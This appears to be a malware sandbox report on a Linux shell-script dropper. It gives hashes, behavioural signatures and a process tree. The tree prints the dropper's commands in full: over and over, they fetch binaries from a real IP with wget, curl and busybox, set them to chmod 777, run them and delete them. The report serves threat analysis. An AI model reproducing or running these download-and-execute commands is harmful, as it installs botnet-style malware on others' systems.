Analysis
-
max time kernel
35s -
max time network
63s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21-11-2024 09:01
Static task
static1
Behavioral task
behavioral1
Sample
fcca7c40df4b391e930e5cde12b5634df2c3353084ab1d67d7852aeeddda1438.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
fcca7c40df4b391e930e5cde12b5634df2c3353084ab1d67d7852aeeddda1438.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
fcca7c40df4b391e930e5cde12b5634df2c3353084ab1d67d7852aeeddda1438.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
fcca7c40df4b391e930e5cde12b5634df2c3353084ab1d67d7852aeeddda1438.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
fcca7c40df4b391e930e5cde12b5634df2c3353084ab1d67d7852aeeddda1438.sh
-
Size
10KB
-
MD5
188b94acf2ad54748ad1a3b6fac2cb52
-
SHA1
14c78cd3314d7e20f1f8fa179edba7eb87987101
-
SHA256
fcca7c40df4b391e930e5cde12b5634df2c3353084ab1d67d7852aeeddda1438
-
SHA512
1e91ee7a86bbb768859e4eabeb320c5e187b7428e2caf0aa45ac68317454f5527bfe496684b6bcd2e770e4ab6158332f439b79add30f44a13803a0c5a60b8d34
-
SSDEEP
96:z3y3y3g3L3v3uRR3mhick7kLANbtfNre+NJNPhkSzVOiozjJKVqyF+NbtfNre+aZ:A2tpxe+NJNPhkSzgtpxe+6tka
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 762 chmod 787 chmod 851 chmod 872 chmod 880 chmod 892 chmod 694 chmod 720 chmod 748 chmod 839 chmod 857 chmod 886 chmod 801 chmod 807 chmod 819 chmod 825 chmod 831 chmod 845 chmod 813 chmod 863 chmod -
Executes dropped EXE 20 IoCs
Processes:
9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfOyG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3JCzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpVuWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HFIilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQqTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6lCMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBBrTVygq67bdKN5FrIylBdjC3WphUPQ5jBgAyQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYtEdto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoIe0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuGGjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdpV8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47MrTVygq67bdKN5FrIylBdjC3WphUPQ5jBgAjlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQqTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6lCMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBBV8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47MyQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYtioc pid process /tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO 696 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO /tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J 721 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J /tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV 750 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV /tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF 764 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF /tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8 788 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8 /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ 802 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l 808 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB 814 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA 820 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt 826 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt /tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI 832 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI /tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG 840 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG /tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp 846 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M 852 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA 858 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ 864 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l 873 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB 881 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M 887 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt 893 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt -
Checks CPU configuration 1 TTPs 20 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ curl File opened for modification /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA curl File opened for modification /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M curl File opened for modification /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA curl File opened for modification /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt curl File opened for modification /tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J curl File opened for modification /tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV curl File opened for modification /tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF curl File opened for modification /tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG curl File opened for modification /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB curl File opened for modification /tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO curl File opened for modification /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB curl File opened for modification /tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI curl File opened for modification /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M curl File opened for modification /tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8 curl File opened for modification /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt curl File opened for modification /tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp curl File opened for modification /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ curl File opened for modification /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l curl File opened for modification /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l curl
Processes
-
/tmp/fcca7c40df4b391e930e5cde12b5634df2c3353084ab1d67d7852aeeddda1438.sh/tmp/fcca7c40df4b391e930e5cde12b5634df2c3353084ab1d67d7852aeeddda1438.sh1⤵PID:662
-
/bin/rm/bin/rm bins.sh2⤵PID:664
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:667
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:690
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:693
-
-
/bin/chmodchmod 777 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO./9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- Executes dropped EXE
PID:696
-
-
/bin/rmrm 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:698
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵PID:699
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:706
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵PID:714
-
-
/bin/chmodchmod 777 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J./yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- Executes dropped EXE
PID:721
-
-
/bin/rmrm yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵PID:722
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵PID:724
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵PID:740
-
-
/bin/chmodchmod 777 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV./CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵PID:751
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵PID:753
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵PID:758
-
-
/bin/chmodchmod 777 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF./uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵PID:765
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵PID:766
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵PID:781
-
-
/bin/chmodchmod 777 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8./IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵PID:789
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:791
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:800
-
-
/bin/chmodchmod 777 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ./jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:803
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:804
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:806
-
-
/bin/chmodchmod 777 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l./qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:809
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵PID:810
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵PID:812
-
-
/bin/chmodchmod 777 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB./CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵PID:815
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:816
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:818
-
-
/bin/chmodchmod 777 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA./rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:821
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:822
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:824
-
-
/bin/chmodchmod 777 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt./yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:827
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:828
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:830
-
-
/bin/chmodchmod 777 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI./Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:833
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵PID:834
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵PID:837
-
-
/bin/chmodchmod 777 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG./e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵PID:841
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:842
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:844
-
-
/bin/chmodchmod 777 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp./GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:847
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:848
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:850
-
-
/bin/chmodchmod 777 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M./V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:853
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:854
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:856
-
-
/bin/chmodchmod 777 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA./rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:859
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:860
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:862
-
-
/bin/chmodchmod 777 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ./jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:865
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:866
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:868
-
-
/bin/chmodchmod 777 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l./qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:874
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵PID:875
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵PID:877
-
-
/bin/chmodchmod 777 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB./CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵PID:882
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:883
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:885
-
-
/bin/chmodchmod 777 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M./V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:888
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:889
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
